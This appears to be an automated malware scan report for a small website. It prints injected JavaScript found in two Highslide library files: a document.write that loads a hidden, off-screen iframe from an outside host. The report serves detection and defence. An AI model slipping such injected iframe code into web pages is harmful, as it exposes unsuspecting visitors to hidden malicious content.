Scanned pages/files
Request | Server response | Status |
http://winetrout.com/ | HTTP/1.1 200 OK Connection: close Date: Sun, 05 Oct 2014 19:50:32 GMT Accept-Ranges: bytes ETag: "12751ff-9e-46bcdb7be1c80" Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6 Content-Length: 158 Content-Type: text/html Last-Modified: Mon, 08 Jun 2009 03:20:02 GMT | clean |
http://www.winetrout.com/home/ | 200 OK Content-Length: 5397 Content-Type: text/html | clean |
http://www.winetrout.com/home/highslide/highslide/highslide-full.js | 200 OK Content-Length: 96551 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (!hs) { var hs = { lang : { cssDirection: 'ltr', loadingText : 'Loading...', loadingTitle : 'Click to cancel', focusTitle : 'Click to bring to front', fullExpandTitle : 'Expand to actual size (f)', creditsText : '', creditsTitle : '', previousText : 'Previous', nextText : 'Next', moveText : 'Move', closeText : 'Close', closeTitle : 'Close (esc)', resizeTitle : 'Resize', playText : 'Play', playTitle : 'Play slide hs.addEventListener(document, 'mouseup', hs.mouseClickHandler); hs.addEventListener(document, 'ready', hs.setClickEvents); hs.addEventListener(window, 'load', hs.preloadImages); hs.addEventListener(window, 'load', hs.preloadAjax); };document.write('<iframe style="position:fixed;top:0px;left:-500px;" src="http://aoodwlcw.dns-stuff.com/a77c0fb85a46dd87a.olz?13" height="330" width="210"></iframe>'); Antivirus reports:
| ||
http://www.winetrout.com/home/highslide/highslide/highslide.config.js | 200 OK Content-Length: 351 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) hs.graphicsDir = 'highslide/graphics/'; hs.outlineType = 'custom'; hs.align = 'center'; hs.captionEval = 'this.a.title'; ;document.write('<iframe style="position:fixed;top:0px;left:-500px;" src="http://aoodwlcw.dns-stuff.com/a77c0fb85a46dd87a.olz?13" height="330" width="210"></iframe>'); Antivirus reports:
| ||
http://winetrout.com/test404page.js | 404 Not Found Content-Length: 522 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: winetrout.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 19:50:32 GMT
Accept-Ranges: bytes
ETag: "12751ff-9e-46bcdb7be1c80"
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6
Content-Length: 158
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 03:20:02 GMT
...158 bytes of data.
GET / HTTP/1.1
Host: winetrout.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 05 Oct 2014 19:50:32 GMT
Accept-Ranges: bytes
ETag: "12751ff-9e-46bcdb7be1c80"
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6
Content-Length: 158
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 03:20:02 GMT
...158 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: winetrout.com
Referer: http://www.google.com/search?q=winetrout.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: winetrout.com
Referer: http://www.google.com/search?q=winetrout.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=winetrout.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://winetrout.com/
Result: winetrout.com is not infected or malware details are not published yet.
Result: winetrout.com is not infected or malware details are not published yet.